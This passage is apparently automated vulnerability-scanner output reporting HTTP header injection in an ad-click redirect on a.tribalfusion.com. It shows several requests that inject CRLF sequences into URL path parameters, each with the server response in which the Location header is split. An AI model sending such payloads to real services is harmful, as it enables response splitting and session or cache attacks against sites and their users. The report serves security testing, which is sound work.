Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=asnEs6xZduHZbPUxQsnRZaKCVehhX710BYm6t0K0PcHewXZcHZadQsdqlUNoNkQDonZbZcZaZafwtJLU2JnWnaTaGEq0NYcGtsCo3L4ImSvZdkLVEa5gC2GklmgSx38Ig0kxND5LVILqlrV3lhRrydDyCRUOixS6GZdyFRYBZcP0YNbt96fhDf5bhpcYBfjNTFHafZaUZd6EaYhZbdXi9oCZaw9uVvUl9OlHrZdoAJXIjbh1WZcUnJTRuYZa2CJ4XBOll7SpZc8rjIwxbRHVY1Mfld8NtPqry3pSVTCS3dD5XURQ7oegNujsUCQ2OiMG0QZcN9Gid0OeJiy1xcM8A4vKdy7EmmH9ut2C1WPQZcYk9mgqq495royFgh3NpkULJlYL7fPO4kTeQdAEdIBkOjRl8KVkyQpIBBBZdgZcRrmrBTvnJZb3xSO9WuFUOcfRKLb8KZaZa7ksleWmqNecCrA10tHqtS6dClZccKk3a3XLnijuiCwL2NGUYvrOYRy3ybyVoHnpSj9PZcbb8x9gRWeyw5IgZbv9ZbAAinhg3kCLBESqZbtZdVNsAHaZdAwQZdstpnEZb3puNMxLglwlMj1WBQGj; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:39 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/df046
b61ace5dcb9/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 12 is copied into the Location response header. The payload 38ffa%0d%0a47ffac444ce was submitted in the REST URL parameter 12. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/38ffa%0d%0a47ffac444ce/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a2nEs6P3rRZaAvIvSnMaYwZdALqK1BGOZbgl75v8CJ6QalZafchSIk7ZaVMiSjLIDm6B5h5DytnFrvlaQhZbQmUEKODtqutZdg8A1uGc9js8to58KZbR0MPTO0l5gmUODA1llM6ODGpADeRupDCHGITLAw7kgstrvIpU3fEZc1pm2DN5Egi0jf1GLLeZaLhPmDr92bnsyH2Zd7T8yyfqR0DsWuZc5i7eOPaLyTvUAMtVZc93wYsZduCjQQK1ovfvddZdyKfSJ93hrJ6Ux8aGbDkAWe2c8FgtRg4I3fv394dImSBFsFvO91IVXhs2vZdJdQjpW89mlDZdiZcJ1HtdQ37Icsa3Ri11FZdZbl6nZan1iWwJZcX3cit7kuv4ZbpLJuDJWUvsIV15VT5jx74LeRpmQSG7uXnAWZaMlCGjgmVfe7Cl8SXTtVABq5iZbt3YMf7nYCw0b6VXSUqKvEKeLs6w09RCbxoVYFvgt1wavwnRVYnGwelglIcts20AWRvPhiGZdUcPS26R3l9XDuly8dBQ4ZaBkLTLtJ9pxtGdvWBt8Mv3dcBKyqixKDPWWpEx3uqty2GqewKjHuml4pj; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:53 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/38ffa
47ffac444ce/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 13 is copied into the Location response header. The payload 2a2b8%0d%0a0c1225ded6 was submitted in the REST URL parameter 13. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/2a2b8%0d%0a0c1225ded6/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aMnEN7R3YQA9APMQM2iKV6E5IixHMfTZbFfgOiLmxyv7BDcZand8Cgy88sXb3EDZbNBo48YI8eSTNkZaxLIrAr0TBvyeBjsQfQZbfdDOS4AVm3ETODxa40aCIAZaDguZb6FnMEJjnQYyqOZdBUl9cWPM7Wkc43FtNljZc19O8mBwjoJY8BGJ6UKTkD2LTburwcpveweRdbTaAytjlBv33YZatZbKS6gg8gaP0B5ZdhBbbZdioZcTU1xU0VpCC3oC6i7SbAQwR10mhlEcD9NCB1tUv0jeOFEI6Aa4dZcePpZdFQZbkGdiBwedk9VBJ5VDfZbXDM8IOy4hAcH1Zd3baSZdSN9ZdPwhoSmCN0XCnXLRIGofZajtIVc1idKZcYZdI2MdM4WWg8jkhnfYmUtYc2BLgbkt5wc4MIHpCyhse19OKyT78IsilshuZb7SZbymnTP7Gykb6ZdZcLh3vRIkid3CTsHTRHoVp6XZd7i7ZcNkiSZa7OqkgjMhN4ZdrqZdYpG1xVZbmcENF0BQ9OT1LHAP7RYO585uJMVkWxoM3nixxNfBvHLZayGkKUrQZcJO7Zalne7qQMfvGiquWZabP7a1n42odY; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:43:24 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/2a2b8
0c1225ded6/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 14 is copied into the Location response header. The payload c89af%0d%0a0d3b2c9d2c9 was submitted in the REST URL parameter 14. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/c89af%0d%0a0d3b2c9d2c9/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=acnEV8r2PKMbuYn3Ydn4F5XpyFRGnTGDP2XlKn2vlsYZaThCaY83G72Ttfc5CJViEZdoE1yd1Usq1ZbkfXpBHsFbApGkQGaGqZahSVsP8xUffgA1ZcJVp3fGOk7aFW4651ixZdiVcxrSBw003nvjXVIEf2XPAXP6XZcC6N7lmJi0Qx9YJoVmjNuqvKua2TbsoQyZbupplRorx58Cv6udkK5BZdnvlBUg9PFVMsC02CkDuHC6wSkHoCoO85TeZaCJZcUVtkJJpJp5flYZcTO5urauvHDJ7Dp3003aZcFqpbqYhwrkd6ItSgJPR80QEwSu7vu1XhBZaT0PGw0w2CJeYDFtIg0c0oH5luK0yWQCcTF0DPbPtSTcIcMWRtVPxAZa2bGJDEEq7u9LJR1oPwDQM8yKZcPFQlNkLhGmfKura8wwWpoETrN9MojwpKjWrWTfKpVicdNDcLcyyhYcn785ynhy9ZalOT65XgXOJsFeJuuYBtATZaDxi8VYSOnUCo4f9q1aX40d5B2QUjZaMRvySYoWNvRbhT8IKlu04rk90BnxZc1IbderjTBELOqbYOocZaCRl6hZcFvan0TpSW; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:43:38 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/c89af
0d3b2c9d2c9/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 15 is copied into the Location response header. The payload 6ed4a%0d%0a7f5049d3d31 was submitted in the REST URL parameter 15. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/6ed4a%0d%0a7f5049d3d31/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a0nEV8S3n0mUyoxZanPmZbn8Rm35W8Y5Fm2k2ZcsaRK8Za4ZbBhGtn71EFGYaX5OPFPctGjZdgytTV9Dr0SQo6nINrQawbopBBVPaeOWm8w3XYBWZdv4My8ulEZdRReTSnfyH5U42OGwMbBLKZdW8QQsoAWeZcE8hgiAPZboYSVsZddgCjuQUEtTTVwfBQZdNahTEgeTl7NyP1KOp9wDRblqTchXphKrXYviHPd1jwgSN0XZaORAeKxrLaNjx65echlp78Hj7Jr6KROy7eGvY4YbfIMiJXJqoZckdWdl5nWZbO0XsHgG23v6dpWSt0UWRPN958T10uiGVVZaJSbWpJuVAPAcvd1m7tPdINNrqZb67nUNhSJQn7ZaAFVUg3UGaQQf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8wQ9lPjVFFvlYaTKiOD9Za2BXgZc9pNkfkju0TQxe3k1Zb9bD11ZdYZcZca8sds1XVvt3msZbL0jmkQX2GWD5S5SExYRZa7bfofqMWdLo0T4iZbihG7cFbtgwVTFrdYCoIIedH3NqMiq7g; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:43:59 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/6ed4a
7f5049d3d31/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 16 is copied into the Location response header. The payload db4cb%0d%0a91914b3fee4 was submitted in the REST URL parameter 16. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/db4cb%0d%0a91914b3fee4/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a5nEV8sjyDtPTFMlFYNZdZaoWpfmPd3NG6PavZc0Zd5wLKPMfkZdtjgTqbQwcqUsPeA7t0YeymfxU8CtwZcdtPT0ObEUq9NvkEwSZcJZcnMSk60wQIduNAxSJZcAlgQgBpslZdhYqZbAvHX3kDusL4V7Gq66PAZdqfclUS10Cfps8EKxkePBMZb1tFFuNmsZdImHnWGB1ZdrGtc1kmR5Vdp77qaOZdYCtMqZanCjWqpY3cURytTFZdKTfyxYJW5DSRcTglhw9UlK6lMcIrxEJX5FykTykZbU1ZdxMMyZaStRa1msRJ4YIwZbZdGmsqPZcrY9552WZc1nSyrqvsobGxGLJZdQmbFcvDQBaWwhrQRCcXhZdxoBgZcqvMBoutyPXMHrFrrTcYV6Xx9VZbpKAPJtpxy3Y4O16vA6Nc5S8JERX9Ol9Fp4C7QvkWwOSYBMqJLGXWZcEsAORlZcyS2oy1nVuiZdEU3pF36uXukZbxZb9yFbY1RTogGRlM2ZcV7dW2isBgU1Zd0vY8ZaWDXZdE8a0MpToBbi1LueSOXNOpGlw9J84WaV9KG6wOgtZcnkxYfJZbeVji6b1BtcMDxWnHuET9jtMfsWqBeZd; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:44:04 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/db4cb
91914b3fee4/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 17 is copied into the Location response header. The payload 519bd%0d%0af6f1a5ca6fc was submitted in the REST URL parameter 17. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/519bd%0d%0af6f1a5ca6fc/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
